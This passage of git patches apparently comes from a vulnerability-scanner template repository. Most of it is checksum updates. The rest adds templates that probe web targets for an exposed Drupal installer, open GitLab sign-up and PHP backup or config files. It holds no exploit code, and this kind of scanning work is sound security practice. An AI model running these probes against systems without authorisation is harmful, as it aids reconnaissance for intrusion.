-http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4 -http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69 +http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc +http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b +http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928 +http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a +http/technologies/wordpress/plugins/under-construction-page.yaml:d4c9887eca48da58b42bdcad120c493e4b916e35 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea -http/technologies/wordpress/plugins/updraftplus.yaml:67b8ef043332480e6cc21270e92a83846dfef37f -http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd -http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 -http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233 -http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 -http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:3c8f70f3717ebb144aeecc4cf78351928e724ee4 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee -http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba -http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 +http/technologies/wordpress/plugins/updraftplus.yaml:0076f3c9a5ed4f2e2d2749c1b65eb23140214d7a +http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487 +http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e +http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404 +http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:9ed780c632c83cd2d948af2a01eee2ea9cdd87a5 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1 +http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6 +http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d -http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 -http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 -http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 -http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 -http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a -http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 -http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded -http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 -http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1 -http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92 +http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee +http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c +http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457 +http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f +http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 +http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c +http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20 +http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce +http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3 +http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:69b5e88af7e6e7b825f22b6f6eb34dea213dab95 +http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549 http/technologies/wordpress/plugins/wp-seopress.yaml:93a821f479301582f2209a9f463b408118cfbec9 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 -http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad -http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 -http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f -http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 -http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 -http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b +http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825 +http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90 +http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624 +http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40 +http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -7058,7 +7059,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:e7b8afb1ac7b6d2345f4ab567158b60c7bab4246 +templates-checksum.txt:eb25a9eff488b0bee2d74eae957640b28e7f7f85 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From d875760869e278f1cd3b6cc9a49ecaba3e31f0e6 Mon Sep 17 00:00:00 2001 From: axrk Date: Mon, 11 Sep 2023 15:04:41 +0200 Subject: [PATCH 0282/1090] Fixed path on drupal-install template --- http/exposures/files/drupal-install.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposures/files/drupal-install.yaml b/http/exposures/files/drupal-install.yaml index c5e1a67dba..7f0c3537f6 100644 --- a/http/exposures/files/drupal-install.yaml +++ b/http/exposures/files/drupal-install.yaml @@ -13,6 +13,7 @@ http: - method: GET path: - "{{BaseURL}}/install.php?profile=default" + - "{{BaseURL}}/core/install.php" host-redirects: true max-redirects: 1 From a549ab009312bd26c5ed191d17de2fa32de1204c Mon Sep 17 00:00:00 2001 From: axrk Date: Mon, 11 Sep 2023 15:39:57 +0200 Subject: [PATCH 0283/1090] Added gitlab-public-registration template --- .../gitlab/gitlab-public-registration.yaml | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 http/misconfiguration/gitlab/gitlab-public-registration.yaml diff --git a/http/misconfiguration/gitlab/gitlab-public-registration.yaml b/http/misconfiguration/gitlab/gitlab-public-registration.yaml new file mode 100644 index 0000000000..0e47e98cdc --- /dev/null +++ b/http/misconfiguration/gitlab/gitlab-public-registration.yaml @@ -0,0 +1,35 @@ +id: gitlab-public-registration + +info: + name: GitLab public registration of new user + author: axrk + severity: info + metadata: + max-request: 1 + shodan-query: http.title:"GitLab" + tags: gitlab,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/users/sign_up" + + matchers-condition: and + matchers: + - type: word + words: + - 'Register' + - 'data-qa-selector="new_user_register_button"' + + - type: word + words: + - 'https://about.gitlab.com' + + - type: status + status: + - 200 + + - type: word + negative: true + words: + - '' \ No newline at end of file From ed8c5ec8cfd0608a727043ec0f9bd80471d1cc11 Mon Sep 17 00:00:00 2001 From: axrk Date: Mon, 11 Sep 2023 16:00:09 +0200 Subject: [PATCH 0284/1090] Updated php-backup-files template --- http/exposures/backups/php-backup-files.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposures/backups/php-backup-files.yaml b/http/exposures/backups/php-backup-files.yaml index ee8a9f5d52..6c594a16f6 100644 --- a/http/exposures/backups/php-backup-files.yaml +++ b/http/exposures/backups/php-backup-files.yaml @@ -61,6 +61,7 @@ http: - /404.php - /wp-login.php - /config.php + - /config bakext: - ".~" From c09c7028211c62530252fd70c1619e6c368f287c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 11 Sep 2023 14:34:35 +0000 Subject: [PATCH 0286/1090] Auto Generated Templates Checksum [Mon Sep 11 14:34:35 UTC 2023] :robot: --- templates-checksum.txt | 4062 ++++++++++++++++++++-------------------- 1 file changed, 2031 insertions(+), 2031 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 8ad11d572d..e5f3bcb5d7 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -620,2025 +620,2025 @@ http/credential-stuffing/cloud/pulmi-login-check.yaml:02e294ce7b26d5732d8fc396fc http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml:a5c13b905ce766747d75254fb82d122c8bbbe70d http/credential-stuffing/self-hosted/grafana-login-check.yaml:3a3891cc6d5dcf12b812bc128a41388883bccc48 http/credential-stuffing/self-hosted/jira-login-check.yaml:906c5a83678bc47a75c5aa5a32925b70d24b804e -http/cves/2000/CVE-2000-0114.yaml:fcd8e8015db69aaba7323d20ef4834bd34fd4346 -http/cves/2001/CVE-2001-0537.yaml:f828a1bb3fb196d8fbc7c6cb30d44af702685156 -http/cves/2002/CVE-2002-1131.yaml:12ad891bdc82a3f86d726abb8f60634c7ee66a98 -http/cves/2004/CVE-2004-0519.yaml:754df65149823fb1a00965ecdcf6c035ac055477 -http/cves/2004/CVE-2004-1965.yaml:c6bbff33a77656d5915c74864c19b9b96469e3ec -http/cves/2005/CVE-2005-2428.yaml:81a6b7269c5778501b4a88d1aa881549b1566473 -http/cves/2005/CVE-2005-3344.yaml:ee476d5b4867277546b61c3b763ebc86d1805523 -http/cves/2005/CVE-2005-3634.yaml:18c119dd04b56fc55e2b557d2240907ce39827ab -http/cves/2005/CVE-2005-4385.yaml:7a55fa9ff9ffa9ce97b5057368084522caa082c5 -http/cves/2006/CVE-2006-1681.yaml:dc2b44c10fb6a72ba9e28a8e4ba4b2070bcf9a51 -http/cves/2006/CVE-2006-2842.yaml:5cd21082cfa348796da46f0dc5b4a2c5060f6c79 -http/cves/2007/CVE-2007-0885.yaml:5d705b5a08f20145996434a34b7ea597f7113cad -http/cves/2007/CVE-2007-4504.yaml:448f34c541739a3de0780799e03b7a98fea9136a -http/cves/2007/CVE-2007-4556.yaml:bcf33151d33a00b651c008a165c61ff243565d24 -http/cves/2007/CVE-2007-5728.yaml:6ac5d779dd7fef31e358315098a15a800cf5c078 -http/cves/2008/CVE-2008-1059.yaml:be30b0cd1d52b19408f6bbb0e15515db87ff7f53 -http/cves/2008/CVE-2008-1061.yaml:a90a799bdd46f6a6be0b599cf5d36bce674d5105 -http/cves/2008/CVE-2008-1547.yaml:c887729ae5d5c691febdbecad3ea9051e17286a8 -http/cves/2008/CVE-2008-2398.yaml:0576017be9ee137d1615f216610a38ffa57b0df0 -http/cves/2008/CVE-2008-2650.yaml:b1b3d7bfa81d97eab89a618280ebf0443a5c1c5b -http/cves/2008/CVE-2008-4668.yaml:ba68f89f73a9c876e2c57f115b2dd9c44af46ebe -http/cves/2008/CVE-2008-4764.yaml:6614e223a1a0b71d911bea9db40b8a1f92f814e7 -http/cves/2008/CVE-2008-5587.yaml:9b9d714dced81e22edd9a4ccd6a858a27e26897b -http/cves/2008/CVE-2008-6080.yaml:8953e0111902369396fd7a86175174008fbed7ae -http/cves/2008/CVE-2008-6172.yaml:ff0ebde9d75c67cc9c93a51c853afa75d3695f6d -http/cves/2008/CVE-2008-6222.yaml:af5a95deeaf6bb64b31960cd005ab29831525086 -http/cves/2008/CVE-2008-6465.yaml:0336c45f66e745ea6303a153fc4b3162df67813d -http/cves/2008/CVE-2008-6668.yaml:8b5902d6abab5f35ed80d652c1cc6da8a25740e3 -http/cves/2008/CVE-2008-6982.yaml:2f43aa36b07f946ab0ec7da49112bfe18e0e5b46 -http/cves/2008/CVE-2008-7269.yaml:a5d67894f862bd1f87c7b145b5c29754b516362a -http/cves/2009/CVE-2009-0347.yaml:87825ec46dede61cf9fbbd08ddcfe19c2dc72a11 -http/cves/2009/CVE-2009-0545.yaml:1510f6d1c547caaa806eafcbe14076cbb17f9060 -http/cves/2009/CVE-2009-0932.yaml:11b0e7c770be8736dae9b24b1416f4516dc4ba26 -http/cves/2009/CVE-2009-1151.yaml:eac16836a03c2598f5fcd7d66b434fbdc1dbe1ea -http/cves/2009/CVE-2009-1496.yaml:7f9acebfddce10f1be6cf4733a4e5778a538956c -http/cves/2009/CVE-2009-1558.yaml:d2369f0bb1e32de1c91605406524a4b2677d4a46 -http/cves/2009/CVE-2009-1872.yaml:7de9c2238e6092aef425fc76e17a8c621d1ca703 -http/cves/2009/CVE-2009-2015.yaml:16218496eb4da369c28a9294b6fb007a10269aaa -http/cves/2009/CVE-2009-2100.yaml:16523fdef3f0ef3643be8d33dcad9ebf052a36aa -http/cves/2009/CVE-2009-3053.yaml:e29b5bdfe0a0625a7584867f6bb78ccf47bb5a53 -http/cves/2009/CVE-2009-3318.yaml:8fa9b325d46dbdbb77cdb5a123e7c12e98db81d1 -http/cves/2009/CVE-2009-4202.yaml:161dd5d71e343f0b97d72f150d22c1c787f746b7 -http/cves/2009/CVE-2009-4223.yaml:6eadfae7bb56559ce4f8b419ccc5b91b16ca91ea -http/cves/2009/CVE-2009-4679.yaml:ef2f0e6629f00c88c369fb88c596c5bdb725b5f9 -http/cves/2009/CVE-2009-5020.yaml:3282c8c32d7b83402cc3e0ea2913856e104e2390 -http/cves/2009/CVE-2009-5114.yaml:2480b1b870782db3cc92e899dc3c0ee487beb960 -http/cves/2010/CVE-2010-0157.yaml:395276e3cb043b9e0875e84ea69e5055c847eb41 -http/cves/2010/CVE-2010-0219.yaml:c897c3583d77c7649e4e61aa267c2046e2cee1ec -http/cves/2010/CVE-2010-0467.yaml:122545a02e8ea3ef0dfb07597df72a13c8569f7e -http/cves/2010/CVE-2010-0696.yaml:ddfbcda84cecd925a5170fee0a333f730c221d79 -http/cves/2010/CVE-2010-0759.yaml:c90d869842c21c4c0aed147b88716531934775e9 -http/cves/2010/CVE-2010-0942.yaml:7b84f808c59626c7a233c25946e289077dc7bbe9 -http/cves/2010/CVE-2010-0943.yaml:30a38c2f08b063aba309df6003a67d92221cee7e -http/cves/2010/CVE-2010-0944.yaml:58a6922d4f8477c0f198c7c572e8da94e2a84729 -http/cves/2010/CVE-2010-0972.yaml:274d55fa676f2fea5fd65ef08290f780e6e1e78e -http/cves/2010/CVE-2010-0982.yaml:04e103d507e7bcb04508b2960fd6f46282cc5a68 -http/cves/2010/CVE-2010-0985.yaml:78a23057dcd3e6ec9855d1c65a3aa5a844d7ee90 -http/cves/2010/CVE-2010-1056.yaml:7fd6a59de39f098b978069b8fc16285785021f0c -http/cves/2010/CVE-2010-1081.yaml:476ad6f966028dc447a011cd37da4461b6fd61de -http/cves/2010/CVE-2010-1217.yaml:5a32c96dd9e65b3bf523fbe6d2eda19a058b2e58 -http/cves/2010/CVE-2010-1219.yaml:77c0fe131905317bf0bc9e6a7b456ce9ac700e8d -http/cves/2010/CVE-2010-1302.yaml:ae9b81301428b564d4ca202063a0be8fbce1517c -http/cves/2010/CVE-2010-1304.yaml:c4f9f902b278e456a4d38b23f6fc1ddb55a04ca5 -http/cves/2010/CVE-2010-1305.yaml:824f8975931f674c1fa7bc895b6f4dca0acb9afe -http/cves/2010/CVE-2010-1306.yaml:3db2bf054eaaf025599e17b5b240824941198be6 -http/cves/2010/CVE-2010-1307.yaml:3aa093dd68bc97439134acc05824b7e50f3db102 -http/cves/2010/CVE-2010-1308.yaml:32e8d7416d537d301ce8c8fef3724e57a1ec21a5 -http/cves/2010/CVE-2010-1312.yaml:d9b3aaa664fba3d809d1b703498d32a6c6368a78 -http/cves/2010/CVE-2010-1313.yaml:8688b00fd8a2ba46f703369db6659c7059ed2b98 -http/cves/2010/CVE-2010-1314.yaml:cd00a726f9096e5d4dd094cf84c37e6104fa072f -http/cves/2010/CVE-2010-1315.yaml:014262c0a3f953ddfaa27e46f60ee4805f22ec44 -http/cves/2010/CVE-2010-1340.yaml:5c79a3de8df3c6d37fa83f0859d2185c1738937c -http/cves/2010/CVE-2010-1345.yaml:ca77ae26c338fb5da53b5b6c52fbb0d0ae505db1 -http/cves/2010/CVE-2010-1352.yaml:d977213071cd97df28f211df7a5d898c7d424abc -http/cves/2010/CVE-2010-1353.yaml:8477fd57011572f58c855667290b3da5539b1528 -http/cves/2010/CVE-2010-1354.yaml:922c368cace625c0d8756e10a5f05f40112b3bc3 -http/cves/2010/CVE-2010-1429.yaml:220282a45049e8103bbe294408cd2dafad4b8d55 -http/cves/2010/CVE-2010-1461.yaml:b02d8f387518cdcde0404d6049b089053ba4e822 -http/cves/2010/CVE-2010-1469.yaml:1d58a97e4e17147f22ccbad68df51c8629f1eb90 -http/cves/2010/CVE-2010-1470.yaml:6a83a940ae16c39c0cb757a2dcac6dbf84f20945 -http/cves/2010/CVE-2010-1471.yaml:49d539ac0839fa80204270d2f36dc48b778402ef -http/cves/2010/CVE-2010-1472.yaml:8980f43f45cd3c9585e49344aa9296a34586afcc -http/cves/2010/CVE-2010-1473.yaml:137a6f558a2dc3870b8085bf8017455a567c72a1 -http/cves/2010/CVE-2010-1474.yaml:8503a0a15f642ba67010074b40c5cfff5d43c44d -http/cves/2010/CVE-2010-1475.yaml:1d4382d68955361d65c2c4bace192d147dd644f3 -http/cves/2010/CVE-2010-1476.yaml:9e9fbc87f0bf96e13a49fd55ae9f783a53f48bb0 -http/cves/2010/CVE-2010-1478.yaml:bee6adc3561506e228af3fa521697a45eddd0dff -http/cves/2010/CVE-2010-1491.yaml:52e8c1a631cce83c258d0527d6dd21491f4d3ad3 -http/cves/2010/CVE-2010-1494.yaml:9956656f0502d09d4b903688f598efde6057b08f -http/cves/2010/CVE-2010-1495.yaml:15f6ea613248a1243bf6b5e1003627419f52ef49 -http/cves/2010/CVE-2010-1531.yaml:94476f2fc7fcc6d645191e87623d094cd7fc24c5 -http/cves/2010/CVE-2010-1532.yaml:3176d00bc3df83261fd39c93db67e1421b61747f -http/cves/2010/CVE-2010-1533.yaml:a9759bfdb959b43322bde710785644e68edbd920 -http/cves/2010/CVE-2010-1534.yaml:1ef1c244b94bad06672f95e518aa4604ca2e4295 -http/cves/2010/CVE-2010-1535.yaml:9a49365f154098f52c630662b5688b3bbf0a47e7 -http/cves/2010/CVE-2010-1540.yaml:c3b3a0f944f0c585f62e7ba92ba5f0cab5425e76 -http/cves/2010/CVE-2010-1586.yaml:13a63404d665bb84e120be31d5420737ae16fbc7 -http/cves/2010/CVE-2010-1601.yaml:605458b2a25fa484d1a6e7bdb5279823177483e9 -http/cves/2010/CVE-2010-1602.yaml:7998c5a4122dd3a17924879ee234efc1a6c049ea -http/cves/2010/CVE-2010-1603.yaml:e568ce207de8b7a004c46ea341a8fbffc92c3c76 -http/cves/2010/CVE-2010-1607.yaml:84f8fca4e992e0c30b7ac852d021a723c38008fe -http/cves/2010/CVE-2010-1653.yaml:a99702c66a324dc473f0feb42b7e53c11b5305e4 -http/cves/2010/CVE-2010-1657.yaml:46c8c356d8c0d100bc02a58a25c5597cc1dc352d -http/cves/2010/CVE-2010-1658.yaml:673e2495a10b80c7d9486e2b9e200a04ae1c5090 -http/cves/2010/CVE-2010-1659.yaml:394693ddd68181a2256c65090206afc3fb8a98b4 -http/cves/2010/CVE-2010-1714.yaml:1b00b30acd53699db831af771071554742a0d59d -http/cves/2010/CVE-2010-1715.yaml:34bc970686a47331c444afe0f6810911994616a9 -http/cves/2010/CVE-2010-1717.yaml:709500b5620c837b593269158720eb1ec56eee28 -http/cves/2010/CVE-2010-1718.yaml:d3552deab4a54a4e8be84b7a1c9a361c6b9f63de -http/cves/2010/CVE-2010-1719.yaml:481539b1ff506829b868515db77269a28fd5c02d -http/cves/2010/CVE-2010-1722.yaml:1b54c11a5705fe701c563fde9137025015b86205 -http/cves/2010/CVE-2010-1723.yaml:5265f4d18cd05481aec0a25bdb5d6936fee86a41 -http/cves/2010/CVE-2010-1858.yaml:d7e10aebb01a4417b34c2e79e30953c259d001c9 -http/cves/2010/CVE-2010-1870.yaml:14e79e1569c497aac97b58a2a10d704db5c51786 -http/cves/2010/CVE-2010-1875.yaml:0d9165bc6db1bee339582f0d990414a104f92d5d -http/cves/2010/CVE-2010-1878.yaml:ac931cd0d43f203651c4e27b9f08cb8eb1aabe83 -http/cves/2010/CVE-2010-1952.yaml:fa1dbe86e6892dd05421889c67b275bdffab2567 -http/cves/2010/CVE-2010-1953.yaml:6f636d06119fcc887026a1d79819b59e8d044160 -http/cves/2010/CVE-2010-1954.yaml:899cc456a5e6bcb267198d67ee05ae5ced33bb06 -http/cves/2010/CVE-2010-1955.yaml:fef9934d4de1ff2c2fcc77726f0428c9867dbb3e -http/cves/2010/CVE-2010-1956.yaml:c203b9a329440f9b76d488edcea9b644807bae4f -http/cves/2010/CVE-2010-1957.yaml:9df1bee0dbbbd3420b7a879da97259ea41c9ec63 -http/cves/2010/CVE-2010-1977.yaml:aa78b3c48712a7863bfe941ed638f425cc1262f7 -http/cves/2010/CVE-2010-1979.yaml:cae77345b63af755d1dc8752a72a836c510e5e6a -http/cves/2010/CVE-2010-1980.yaml:a8f798d7fcf1c61f99c9bbd19ad846a0f0d4015a -http/cves/2010/CVE-2010-1981.yaml:b413f01840bd3cb7028387ec63a2963caa5fb299 -http/cves/2010/CVE-2010-1982.yaml:1ce7b86190fec13a81a06721b8529af49a887fe7 -http/cves/2010/CVE-2010-1983.yaml:90cf867c00d926d105910fb8b1b8154f7b9ec787 -http/cves/2010/CVE-2010-2033.yaml:269cce4212a32f096b37f660726f76f1f985c8c2 -http/cves/2010/CVE-2010-2034.yaml:e17abca62211ea724ec42e92dce9f5fd084bf284 -http/cves/2010/CVE-2010-2035.yaml:c50f3a36d1f194f4652d58adce3061464e72c939 -http/cves/2010/CVE-2010-2036.yaml:d45bce5a55ffd0501cd13a65ec828aaef8605b96 